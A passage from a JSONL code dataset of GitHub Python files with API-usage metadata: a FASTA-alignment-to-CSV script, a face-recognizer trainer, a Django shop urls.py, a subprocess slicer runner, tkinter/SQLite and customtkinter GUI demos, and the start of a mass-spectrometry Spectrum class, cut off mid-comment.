"sympy.S.Half", "line_number": 587, "usage_type": "attribute"}, {"api_name": "sympy.S", "line_number": 587, "usage_type": "name"}, {"api_name": "sympy.S.Half", "line_number": 588, "usage_type": "attribute"}, {"api_name": "sympy.S", "line_number": 588, "usage_type": "name"}, {"api_name": "sympy.S.Half", "line_number": 589, "usage_type": "attribute"}, {"api_name": "sympy.S", "line_number": 589, "usage_type": "name"}, {"api_name": 
"sympy.S.Half", "line_number": 590, "usage_type": "attribute"}, {"api_name": "sympy.S", "line_number": 590, "usage_type": "name"}, {"api_name": "sympy.S.Half", "line_number": 591, "usage_type": "attribute"}, {"api_name": "sympy.S", "line_number": 591, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 601, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 618, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 619, "usage_type": "call"}, {"api_name": "sympy.physics.mechanics.dynamicsymbols", "line_number": 620, "usage_type": "call"}, {"api_name": "sympy.physics.mechanics.dynamicsymbols", "line_number": 621, "usage_type": "call"}, {"api_name": "sympy.symbols", "line_number": 622, "usage_type": "call"}, {"api_name": "sympy.symbols", "line_number": 623, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 624, "usage_type": "call"}, {"api_name": "sympy.physics.mechanics.dynamicsymbols", "line_number": 625, "usage_type": "call"}, {"api_name": "dynamics.HarmonicOscillator", "line_number": 635, "usage_type": "call"}, {"api_name": "sympy.S.Half", "line_number": 635, "usage_type": "attribute"}, {"api_name": "sympy.S", "line_number": 635, "usage_type": "name"}, {"api_name": "sympy.symbols", "line_number": 642, "usage_type": "call"}, {"api_name": "sympy.symbols", "line_number": 644, "usage_type": "call"}, {"api_name": "sympy.S.Half", "line_number": 647, "usage_type": "attribute"}, {"api_name": "sympy.S", "line_number": 647, "usage_type": "name"}, {"api_name": "sympy.cos", "line_number": 648, "usage_type": "call"}, {"api_name": "sympy.sin", "line_number": 648, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 662, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 663, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 664, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 665, "usage_type": "call"}, {"api_name": "sympy.physics.mechanics.dynamicsymbols", "line_number": 666, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 668, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 669, "usage_type": "call"}, {"api_name": "sympy.physics.mechanics.dynamicsymbols", "line_number": 670, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 678, "usage_type": "call"}, {"api_name": "elements.MaterialPoint", "line_number": 690, "usage_type": "call"}, {"api_name": "sympy.sin", "line_number": 691, "usage_type": "call"}, {"api_name": "elements.MaterialPoint", "line_number": 693, "usage_type": "call"}, {"api_name": "sympy.cos", "line_number": 694, "usage_type": "call"}, {"api_name": "elements.GravitationalForce", "line_number": 697, "usage_type": "call"}, {"api_name": "sympy.cos", "line_number": 699, "usage_type": "call"}, {"api_name": "sympy.S.Zero", "line_number": 742, "usage_type": "attribute"}, {"api_name": "sympy.S", "line_number": 742, "usage_type": "name"}, {"api_name": "sympy.S.Zero", "line_number": 745, "usage_type": "attribute"}, {"api_name": "sympy.S", "line_number": 745, "usage_type": "name"}, {"api_name": "sympy.Symbol", "line_number": 750, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 751, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 752, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 753, "usage_type": "call"}, {"api_name": "sympy.physics.mechanics.dynamicsymbols", "line_number": 754, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 756, 
"usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 757, "usage_type": "call"}, {"api_name": "sympy.physics.mechanics.dynamicsymbols", "line_number": 758, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 766, "usage_type": "call"}, {"api_name": "elements.MaterialPoint", "line_number": 786, "usage_type": "call"}, {"api_name": "sympy.sin", "line_number": 787, "usage_type": "call"}, {"api_name": "elements.MaterialPoint", "line_number": 789, "usage_type": "call"}, {"api_name": "sympy.cos", "line_number": 790, "usage_type": "call"}, {"api_name": "elements.GravitationalForce", "line_number": 793, "usage_type": "call"}, {"api_name": "sympy.cos", "line_number": 795, "usage_type": "call"}, {"api_name": "sympy.S.Zero", "line_number": 843, "usage_type": "attribute"}, {"api_name": "sympy.S", "line_number": 843, "usage_type": "name"}, {"api_name": "sympy.S.Zero", "line_number": 846, "usage_type": "attribute"}, {"api_name": "sympy.S", "line_number": 846, "usage_type": "name"}, {"api_name": "sympy.Symbol", "line_number": 857, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 858, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 859, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 860, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 861, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 862, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 863, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 864, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 865, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 866, "usage_type": "call"}, {"api_name": "sympy.physics.mechanics.dynamicsymbols", "line_number": 867, "usage_type": "call"}, {"api_name": "sympy.physics.mechanics.dynamicsymbols", "line_number": 868, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 881, "usage_type": "call"}, {"api_name": "elements.Disk", "line_number": 906, "usage_type": "call"}, {"api_name": "elements.Spring", "line_number": 907, "usage_type": "call"}, {"api_name": "elements.Force", "line_number": 911, "usage_type": "call"}, {"api_name": "functools.cached_property", "line_number": 899, "usage_type": "name"}, {"api_name": "sympy.symbols", "line_number": 929, "usage_type": "call"}, {"api_name": "sympy.symbols", "line_number": 930, "usage_type": "call"}, {"api_name": "sympy.S.Half", "line_number": 933, "usage_type": "attribute"}, {"api_name": "sympy.S", "line_number": 933, "usage_type": "name"}, {"api_name": "sympy.S.Half", "line_number": 934, "usage_type": "attribute"}, {"api_name": "sympy.S", "line_number": 934, "usage_type": "name"}, {"api_name": "sympy.S.Half", "line_number": 935, "usage_type": "attribute"}, {"api_name": "sympy.S", "line_number": 935, "usage_type": "name"}, {"api_name": "sympy.S.Half", "line_number": 936, "usage_type": "attribute"}, {"api_name": "sympy.S", "line_number": 936, "usage_type": "name"}, {"api_name": "sympy.S.Half", "line_number": 937, "usage_type": "attribute"}, {"api_name": "sympy.S", "line_number": 937, "usage_type": "name"}, {"api_name": "sympy.cos", "line_number": 938, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 948, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 952, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 957, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 961, "usage_type": "call"}, {"api_name": 
"sympy.Symbol", "line_number": 969, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 970, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 975, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 976, "usage_type": "call"}]}
+{"seq_id": "16943979908", "text": "\nimport sys\nimport os\nimport csv\nimport pandas as pd\nimport argparse\n\n'''\nThis scripts creates a csv table from the master alignment fasta file.\n\nRecommended usage:\n\ncat data/sh2_master_edited.fasta | python table_from_master_alignment_with_numbers_intendation_20210316.py ../data/SH2_domain_containing_prot_right_resnum_fixed.csv > table_alignment.csv\n'''\n\n\nparser = argparse.ArgumentParser(\n formatter_class=argparse.RawTextHelpFormatter\n )\nparser.add_argument(\n type=str, \n dest='inputfile2'\n )\nargs = parser.parse_args()\n\ninputfile2 = args.inputfile2\n\n# with open(sys.stdin, \"r\") as fasta:\n# line = fasta.readline()\n#print(line, \"\\n\", \"Succesful fasta file read.\")\n\n#table = pd.read_csv('/home/takacsg/Documents/SH2DB/SH2_domain_containing_prot_new_uniprot_start_stop_filled.csv')\n#print(table.head())\n\n#with open('/home/takacsg/Documents/SH2DB/SH2_domain_containing_prot_new_uniprot_start_stop_filled.csv') as table:\nwith open(inputfile2) as table:\n numbers = {}\n for line in table:\n line = line.split(',')\n #print(\"this is the line\", line)\n ID = line[6]\n start = line[11]\n stop = line[12]\n numbers[ID] = [start, stop]\n \n \nn = 0\nlista = []\n# with open(sys.stdin, \"r\") as fasta:\nfor x in sys.stdin:\n x = x.rstrip()\n n += 1\n if n % 2 != 0:\n current_ID = x.rstrip() # x = eg.: STAT6 \n current_ID = current_ID[1:] #.split('>')[1]\n current_ID = current_ID.split('|')[0]\n #print(current_ID)\n else:\n #lista = len(x) # x is the original sequence (with gaps)\n print(current_ID + ',' + ','.join(x)) # this will give the comma separated sequence with gaps\n lista2 = [] # that will give the residue numbers\n non_gap = False # It should remain False until y = \"-\" (gap)\n counter = 0\n lista2.append(\" \") # Added because ID-s are the first cells of rows\n try: \n counter_target = int(numbers[current_ID][1]) - int(numbers[current_ID][0])\n for y in x:\n if non_gap:\n if counter == counter_target:\n lista2.append(numbers[current_ID][1].rstrip())\n break\n if y != \"-\":\n num = str(int(numbers[current_ID][0]) + counter)\n lista2.append(num)\n counter += 1\n #continue\n else:\n lista2.append(\" \")\n elif y != '-':\n non_gap = True\n counter += 1\n try:\n lista2.append(numbers[current_ID][0])\n except: continue\n elif y == '-':\n lista2.append(\" \")\n continue\n print(','.join(lista2))\n except KeyError: \n #counter_target = 10000\n print(\" No structure found \")\n \n", "repo_name": "keserulab/SH2db", "sub_path": "shared/sh2db/Scripts/table_process_B1__table_from_master_alignment.py", "file_name": "table_process_B1__table_from_master_alignment.py", "file_ext": "py", "file_size_in_byte": 2965, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 17, "usage_type": "call"}, {"api_name": "argparse.RawTextHelpFormatter", "line_number": 18, "usage_type": "attribute"}, {"api_name": "sys.stdin", "line_number": 50, "usage_type": "attribute"}]}
+{"seq_id": "12711493553", "text": "import os\nimport numpy as np \nfrom PIL import Image\nimport cv2\n\n\nrecog = cv2.face.LBPHFaceRecognizer_create()\npath = 'dataset'\n\ndef getImageswithID(path):\n\timagePaths = [os.path.join(path,f) for f in os.listdir(path)]\n\tfaces = []\n\tNames = []\n\n\tfor imgpath in imagePaths:\n\t\tfaceImg = Image.open(imgpath)\n\t\tfaceNp = np.array(faceImg,'uint8')\n\t\tName = (os.path.split(imgpath)[-1].split('_')[0])\n\t\t\n\t\tfaces.append(faceNp)\n\t\tNames.append(Name)\n\t\tcv2.imshow('training',faceNp)\n\t\tcv2.waitKey(10)\n\treturn Names, faces\n\nNames ,faces = getImageswithID(path)\nNames=[0]*len(faces)\nrecog.train(faces,np.array(Names))\nrecog.write('trainingData1.yml')\ncv2.destroyAllWindows()\n\n", "repo_name": "InternityFoundation/Perceptron_3038", "sub_path": "Sprint Cycles/Navjot Singh/Face detection/face_recog_train.py", "file_name": "face_recog_train.py", "file_ext": "py", "file_size_in_byte": 662, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 9, "dataset": "github-code", "pt": "32", "api": [{"api_name": "cv2.face.LBPHFaceRecognizer_create", "line_number": 7, "usage_type": "call"}, {"api_name": "cv2.face", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 11, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 16, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 16, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path.split", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 30, "usage_type": "call"}]}
+{"seq_id": "32912879767", "text": "from django.conf.urls import url\r\nfrom . import views\r\nfrom .import Code\r\nurlpatterns = [\r\n #卖家选择\r\n url(r'^manage_shop_home/', views.manage_shop_home, name='manage_shop_home'),\r\n #登录路由\r\n url(r'^manage_login/',views.manage_login,name='manage_login'),\r\n url(r'^manage_login_han/',views.manage_login_han,name='manage_login_han'),\r\n url(r'^manage_home/(?P[0-9]+)?',views.manage_home,name='manage_home'),\r\n url(r'^manage_login_out/',views.manage_login_out,name='manage_login_out'),\r\n url(r'^manage_Code',Code.tu),\r\n #商品路由\r\n url(r'^manage_add/',views.manage_add,name='manage_add'),\r\n url(r'^manage_add_han/',views.manage_add_han,name='manage_add_han'),\r\n url(r'^manage_add_list/', views.manage_add_list, name='manage_add_list'),\r\n url(r'^manage_add_list_del/(?P[0-9]+)?', views.manage_add_list_del, name='manage_add_list_del'),\r\n url(r'^manage_add_list_modify/(?P[0-9]+)?', views.manage_add_list_modify, name='manage_add_list_modify'),\r\n url(r'^manage_add_modify_han/', views.manage_modify_han, name='manage_modify_han'),\r\n #商品上架/下架\r\n url(r'^manage_add_up/(?P[0-9]+)?',views.manage_add_up, name='manage_add_up'),\r\n url(r'^manage_add_dowm/(?P[0-9]+)?',views.manage_add_dowm, name='manage_add_dowm'),\r\n #类别路由\r\n url(r'^manage_leibie/',views.manage_leibie,name='manage_leibie'),\r\n url(r'^manage_leibie_han/',views.manage_leibie_han,name='manage_leibie_han'),\r\n url(r'^manage_leibie_del/(?P[0-9]+)?',views.manage_leibie_del,name='manage_leibie_del'),\r\n url(r'^leibie_modify/(?P[0-9]+)?',views.leibie_modify,name='leibie_modify'),\r\n url(r'^leibie_modify_han/',views.leibie_modify_han,name='leibie_modify_han'),\r\n url(r'^manage_leibie_list/', views.manage_leibie_list, name='manage_leibie_list'),\r\n #商家订单管理\r\n url(r'^manage_order_list/', views.manage_order_list, name='manage_order_list'),\r\n url(r'^manage_order_page/(?P[0-9]+)?', views.manage_order_page, name='manage_order_page'),\r\n url(r'^manage_order_comment/(?P[0-9]+)?', views.manage_order_comment, name='manage_order_comment'),\r\n #发货操作\r\n url(r'^manage_logistics/(?P[0-9]+)?', views.manage_logistics, name='manage_logistics'),\r\n url(r'^manage_logistics_han/', views.manage_logistics_han, name='manage_logistics_han'),\r\n #会员管理\r\n url(r'^manage_member_list/', views.manage_member_list, name='manage_member_list'),\r\n url(r'^manage_member_email/(?P[0-9]+)?', views.manage_member_email, name='manage_member_email'),\r\n url(r'^manage_show_email/(?P[0-9]+)?', views.manage_show_email, name='manage_show_email'),\r\n url(r'^manage_member_han/', views.manage_member_han, name='manage_member_han'),\r\n #权限管理\r\n url(r'^manage_power_list/', views.manage_power_list, name='manage_power_list'),\r\n url(r'^manage_power_add/', views.manage_power_add, name='manage_power_add'),\r\n url(r'^manage_power_han/', views.manage_power_han, name='manage_power_han'),\r\n url(r'^manage_power_modify/(?P[0-9]+)', views.manage_power_modify, name='manage_power_modify'),\r\n url(r'^manage_power_modify_han/', views.manage_power_modify_han, name='manage_power_modify_han'),\r\n url(r'^manage_power_del/', views.manage_power_del, name='manage_power_del'),\r\n #角色管理\r\n url(r'^manage_role_list/', views.manage_role_list, name='manage_role_list'),\r\n url(r'^manage_role_add/', views.manage_role_add, name='manage_role_add'),\r\n url(r'^manage_role_modify/', views.manage_role_modify, name='manage_role_modify'),\r\n url(r'^manage_role_del/', views.manage_role_del, name='manage_role_del'),\r\n]", "repo_name": 
"MyUncle1997/python_django_shop", "sub_path": "manageuser/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 3665, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "django.conf.urls.url", "line_number": 6, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 18, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 19, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 21, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 22, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 24, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 25, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 26, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 27, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 28, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 29, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 31, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 32, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 33, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 35, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 36, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 38, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 39, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 40, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 41, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 43, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 44, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 45, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 46, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 47, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 48, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 50, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 51, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 52, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 53, "usage_type": "call"}]}
+{"seq_id": "2920329336", "text": "import os\nimport json\nimport time\nimport subprocess\nimport datetime\nimport signal\nimport argparse\nimport logging\nimport pandas as pd\n\ndef process(file_path, start, end):\n '''\n frame = pd.read_json(file_path, lines=True)\n files = list(frame['file_name'])\n timeout = 5\n '''\n i = start\n timeout = 5\n files = os.listdir(file_path)\n print(len(files))\n if end > len(files):\n end = len(files)\n while i < end:\n slicer = \"bash ./slicer.sh \" + file_path + \" \" + str(files[i]) + \" 1 \" + \"parsed/\" + str(files[i])\n start0 = datetime.datetime.now()\n process1 = subprocess.Popen(slicer, shell = True)\n while process1.poll() is None:\n time.sleep(0.2)\n end0 = datetime.datetime.now()\n if (end0-start0).seconds > timeout:\n os.kill(process1.pid, signal.SIGKILL)\n os.waitpid(-1, os.WNOHANG)\n i += 1\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--file_path', help='funtions dic.', default='../devign_dataset')\n parser.add_argument('--start', help='start functions number to parsed', type=int, default=0)\n parser.add_argument('--end', help='end functions number to parsed', type=int, default=4500)\n args = parser.parse_args()\n file_path = args.file_path\n start = args.start\n end = args.end\n process(file_path, start, end)\n\n", "repo_name": "AMPLE001/AMPLE", "sub_path": "data_processing/process.py", "file_name": "process.py", "file_ext": "py", "file_size_in_byte": 1411, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 21, "dataset": "github-code", "pt": "32", "api": [{"api_name": "os.listdir", "line_number": 19, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 25, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 25, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 26, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 29, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.kill", "line_number": 31, "usage_type": "call"}, {"api_name": "signal.SIGKILL", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.waitpid", "line_number": 32, "usage_type": "call"}, {"api_name": "os.WNOHANG", "line_number": 32, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 37, "usage_type": "call"}]}
+{"seq_id": "35324765860", "text": "import customtkinter\n\ncustomtkinter.set_appearance_mode(\"System\") # Modes: system (default), light, dark\ncustomtkinter.set_default_color_theme(\"blue\") # Themes: blue (default), dark-blue, green\n\napp = customtkinter.CTk() # create CTk window like you do with the Tk window\nscreen_width = app.winfo_screenwidth()\nscreen_height = app.winfo_screenheight()\n\n# Set window size to 1024x720 unless the screen is too small\nwindow_width = min(1024, screen_width)\nwindow_height = min(720, screen_height)\napp.geometry(f\"{window_width}x{window_height}\")\n\ndef button_function():\n app.destroy()\n\n# CTkButton example \nbutton = customtkinter.CTkButton(master=app, text=\"End!\", command=button_function)\nbutton.place(relx=0.5, rely=0.5, anchor=customtkinter.CENTER)\n\napp.mainloop()", "repo_name": "ProfessorRich/dnd-combat-simulator", "sub_path": "tkinter_interface.py", "file_name": "tkinter_interface.py", "file_ext": "py", "file_size_in_byte": 768, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "customtkinter.set_appearance_mode", "line_number": 3, "usage_type": "call"}, {"api_name": "customtkinter.set_default_color_theme", "line_number": 4, "usage_type": "call"}, {"api_name": "customtkinter.CTk", "line_number": 6, "usage_type": "call"}, {"api_name": "customtkinter.CTkButton", "line_number": 19, "usage_type": "call"}, {"api_name": "customtkinter.CENTER", "line_number": 20, "usage_type": "attribute"}]}
+{"seq_id": "26894287202", "text": "# www.plus2net.com\n# download updated script at https://www.plus2net.com/python/tkinter-sqlite-insert.php\nimport sqlite3\n\nmy_conn = sqlite3.connect('my_db.db')\n# print(\"Opened database successfully\");\n\nimport tkinter as tk\nfrom tkinter import *\n\nmy_w = tk.Tk()\nmy_w.geometry(\"400x250\")\nmy_w.title(\"www.plus2net.com\")\n# add one Label\nl0 = tk.Label(my_w, text='Add Student',\n font=('Helvetica', 16), width=30, anchor=\"c\")\nl0.grid(row=1, column=1, columnspan=4)\n\nl1 = tk.Label(my_w, text='Name: ', width=10, anchor=\"c\")\nl1.grid(row=3, column=1)\n\n# add one text box\nt1 = tk.Text(my_w, height=1, width=10, bg='white')\nt1.grid(row=3, column=2)\n\nl2 = tk.Label(my_w, text='Class: ', width=10)\nl2.grid(row=4, column=1)\n\n# add list box for selection of class\noptions = StringVar(my_w)\noptions.set(\"\") # default value\n\nopt1 = OptionMenu(my_w, options, \"Three\", \"Four\", \"Five\")\nopt1.grid(row=4, column=2)\n\nl3 = tk.Label(my_w, text='Mark: ', width=10)\nl3.grid(row=5, column=1)\n\n# add one text box\nt3 = tk.Text(my_w, height=1, width=4, bg='white')\nt3.grid(row=5, column=2)\n\nradio_v = tk.StringVar()\nradio_v.set('Female')\nr1 = tk.Radiobutton(my_w, text='Male', variable=radio_v, value='Male')\nr1.grid(row=6, column=2)\n\nr2 = tk.Radiobutton(my_w, text='Female', variable=radio_v, value='Female')\nr2.grid(row=6, column=3)\n\nb1 = tk.Button(my_w, text='Add Record', width=10,\n command=lambda: add_data())\nb1.grid(row=7, column=2)\nmy_str = tk.StringVar()\nl5 = tk.Label(my_w, textvariable=my_str, width=10)\nl5.grid(row=3, column=3)\nmy_str.set(\"Output\")\n\n\ndef add_data():\n flag_validation = True # set the flag\n my_name = t1.get(\"1.0\", END) # read name\n my_class = options.get() # read class\n my_mark = t3.get(\"1.0\", END) # read mark\n my_gender = radio_v.get() # read gender\n\n # length of my_name , my_class and my_gender more than 2\n if (len(my_name) < 2 or len(my_class) < 2 or len(my_gender) < 2):\n flag_validation = False\n try:\n val = int(my_mark) # checking mark as integer\n except:\n flag_validation = False\n\n if (flag_validation):\n my_str.set(\"Adding data...\")\n try:\n\n # print(\"Connected to database successfully\")\n\n my_data = (None, my_name, my_class, my_mark, my_gender)\n my_query = \"INSERT INTO student values(?,?,?,?,?)\"\n my_conn.execute(my_query, my_data)\n my_conn.commit()\n x = my_conn.execute('''select last_insert_rowid()''')\n id = x.fetchone()\n l5.grid()\n l5.config(fg='green') # foreground color\n l5.config(bg='white') # background color\n my_str.set(\"ID:\" + str(id[0]))\n l5.after(3000, lambda: l5.grid_remove())\n t1.delete('1.0', END) # reset the text entry box\n t3.delete('1.0', END) # reset the text entry box\n\n except sqlite3.Error as my_error:\n l5.grid()\n # return error\n l5.config(fg='red') # foreground color\n l5.config(bg='yellow') # background color\n print(my_error)\n my_str.set(my_error)\n\n else:\n l5.grid()\n l5.config(fg='red') # foreground color\n l5.config(bg='yellow') # background color\n my_str.set(\"check inputs.\")\n l5.after(3000, lambda: l5.grid_remove())\n\n\nmy_w.mainloop()\nmy_conn.close()", "repo_name": "Wachu75/pyfestival", "sub_path": "tydzien-5/tkinter_sql_01.py", "file_name": "tkinter_sql_01.py", "file_ext": "py", "file_size_in_byte": 3368, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sqlite3.connect", "line_number": 5, "usage_type": "call"}, {"api_name": "tkinter.Tk", 
"line_number": 11, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 15, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 19, "usage_type": "call"}, {"api_name": "tkinter.Text", "line_number": 23, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 26, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 36, "usage_type": "call"}, {"api_name": "tkinter.Text", "line_number": 40, "usage_type": "call"}, {"api_name": "tkinter.StringVar", "line_number": 43, "usage_type": "call"}, {"api_name": "tkinter.Radiobutton", "line_number": 45, "usage_type": "call"}, {"api_name": "tkinter.Radiobutton", "line_number": 48, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 51, "usage_type": "call"}, {"api_name": "tkinter.StringVar", "line_number": 54, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 55, "usage_type": "call"}, {"api_name": "sqlite3.Error", "line_number": 95, "usage_type": "attribute"}]}
+{"seq_id": "25173281523", "text": "import numpy as np\nfrom sklearn.metrics.pairwise import cosine_similarity\n\n\nclass Spectrum:\n def __init__(\n self, mz: np.array = None, intensity: np.array = None, num_fragments: int = 10\n ):\n \"\"\"\n Creates a mass spectrometry spectrum, defined by its m/z bins and corresponding intensity values.\n Parameters\n ----------\n mz : np.array\n Array of mass:charge ratios.\n intensity : np.array\n Array of intensity values at corresponding indices of m/z.\n num_fragments : int\n Number of most intense fragments to extract.\n \"\"\"\n self.mz = mz\n self.intensity = intensity\n self.extracted_intensity = None\n self.extracted_mz = None\n self._extract_most_intense(num_fragments=num_fragments)\n return\n\n def _extract_most_intense(self, num_fragments: int = 10):\n \"\"\"\n Extracts the most intense m/z bins, and stores the intensity and m/z sorted values in self.extracted_mz and\n self.extracted_intensity\n Parameters\n ----------\n spectrum_intensity : np.array\n Array containing the spectrum intensities to extract.\n spectrum_mz : np.array\n Array containing the m/z values corresponding to the spectrum intensities. If None, the index corresponding to\n the intensities is returned. Default: None.\n num_fragments : int\n Number of fragments to extract. Default: 10.\n\n Returns\n -------\n tuple\n Tuple of np.arrays sorted in decreasing order: (mz, intensity) corresponding to the most intense peaks. I.e.,\n the most intense peak is first.\n \"\"\"\n if len(self.mz) == 0:\n self.mz = np.arange(len(self.intensity))\n\n # Sort fragments\n arg_idx = np.argsort(self.intensity)\n # Reverse list; take only top num_fragments\n # Check against np.inf\n if num_fragments == np.inf:\n # Take all fragments\n arg_idx = arg_idx[::-1]\n else:\n arg_idx = arg_idx[-1 : -(num_fragments + 1) : -1]\n self.extracted_mz = self.mz[arg_idx]\n self.extracted_intensity = self.intensity[arg_idx]\n return\n\n def get_matching_mz_indices(\n self, spectrum_to_match: \"Spectrum\", match_tolerance_ppm: int = 30\n ) -> tuple:\n \"\"\"\n Checks whether the extracted fragments from this spectrum matches those of another. Matches are defined as two\n spectra having high intensity values at the same m/z bin, within tolerance.\n Parameters\n ----------\n spectrum_to_match : Spectrum\n Other Spectrum object to compare.\n min_fragment : int\n Minimum number of fragments to consider a match\n match_tolerance_ppm : int\n The margin of error given to bins.\n\n Returns\n -------\n tuple\n Pair of lists corresponding to the indices that are matched across the spectra. (self_idx, spectrum_to_match_idx)\n \"\"\"\n\n # Spectra might be of different length; no clean way to compare them in bulk\n # First sort by mz, then crawl through each. 
